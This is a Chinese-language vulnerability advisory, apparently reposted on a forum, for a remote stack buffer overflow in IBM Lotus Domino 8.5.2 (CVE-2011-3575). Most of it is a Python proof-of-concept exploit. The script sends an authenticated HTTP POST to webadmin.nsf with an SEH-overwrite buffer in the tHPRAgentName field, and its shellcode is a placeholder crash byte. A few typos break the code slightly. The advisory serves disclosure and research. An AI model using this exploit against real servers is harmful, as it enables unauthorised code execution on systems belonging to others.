|
IBM Lotus Domino "NSFComputeEvaluateExt()"函数远程栈缓冲区溢出漏洞
发布日期:2011-09-21
更新日期:2011-09-21
受影响系统:
IBM Lotus Domino 8.5.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49705
CVE ID: CVE-2011-3575
Lotus Domino是集电子邮件、文档数据库、快速应用开发技术以及Web技术为一体的电子邮件与群集平台。
IBM Lotus Domino在"NSFComputeEvaluateExt()"函数的实现上存在远程栈缓冲区溢出漏洞,远程攻击者可利用此漏洞以系统级别的权限执行任意代码,完全控制受影响计算机。
WebAdmin.nsf模块没有进行正确的边界检查。通过发送特制的HTTP POST请求,远程已验证攻击者可以系统级别的权限造成缓冲区溢出和执行任意代码。
<*来源:rmallof
链接:http://www.research.reversingcod ... /73-ibm-ssd-1012211
http://xforce.iss.net/xforce/xfdb/69802
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
import socket,struct,sys,os
host="192.168.x.y" #server ip here!
cookie="1234567890abcdef" #Set your Cookie credential here! Cookie = base64((usr:pwd))
#Shellcode = Using XOR [reg],reg to crash ("like" INT3  )
Shellcode=chr(0x30)
server=host,80
SEH=struct.pack("<L",0x60404672) # POP ESI - POP EBP - RETN nnotes.dll.60404672
nSEH=struct.pack("<L",0x4141347A) # INC ecx ;NOP
# INC ecx ;NOP
# JPE slep ;Detour
vars="__Click=0&tHPRAgentName=" #tHPRAgentName => Vulnerable POST variable
buf="A"*436 #sended buffer-nSEH-SEH
slep="X"*46 #pre-shellcode to fix JPE landing
#This function forges our POST request (with our Shellcode sure)
def buildPOST(h,b,c):
P=" OST /webadmin.nsf/fmHttpPostRequest?OpenForm&Seq=1 HTTP/1.1\r\n"
P+="Host: "+h+"\r\n"
P+="User-Agent: oh sure\r\n"
P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
P+="Accept-Language: chinnese plz\r\n"
P+="Accept-Encoding: gzip,deflate\r\n"
P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
P+="Keep-Alive: 115\r\n"
P+="Connection: keep-alive\r\n"
P+="Referer: http://"+h+"/webadmin.nsf/dlgConfigPorts?ReadForm&objref=16\r\n"
P+="Cookie: CWCweb=\"savedLocale:en\"\r\n"
P+="Authorization: Basic "+c+"\r\n"
P+="Content-Type: application/x-www-form-urlencoded\r\n"
P+="Content-Length: %s\r\n" % str(len(b))
P+="\r\n"
P+=b
return P
def main():
if os.name=="nt":
os.system("cls"
else:
os.system("clear"
print"\t->[ IBM Lotus Domino 8.5.2 Remote Stack Overflow ]<-"
print"\t ->[Remote Code Execution Exploit]<-\n\n"
print"[+] Crafting buffer..."
#Creating POST content data
buffer=vars+buf+nSEH+SEH+slep+Shellcode
print"[+] Connecting to server..."
s=socket.socket()
#Trying connect to IBM Lotus Domino HTTP server
try:
s.connect(server)
#We goin to exit if this fails
except:
print"[-] Error connecting to remote server..."
sys.exit(0)
print"[+] Crafting POST request..."
#Crafting final POST
post=buildPOST(host,buffer,cookie)
print"[+] 0k, sending..."
#Sending Shellcode to remote server
s.send(post)
#Server is running? Some fails :S
try:
print s.recv(204
print"[x] Exploit failed!"
#Else we achieve remote code execution successfully
except:
print"[+] Done!"
s.close()
print"\n By @rmallof"
if __name__=="__main__":
main()
建议:
--------------------------------------------------------------------------------
厂商补丁:
IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ers.ibm.com/ | 
免费注册
发表于 2011-09-25 22:24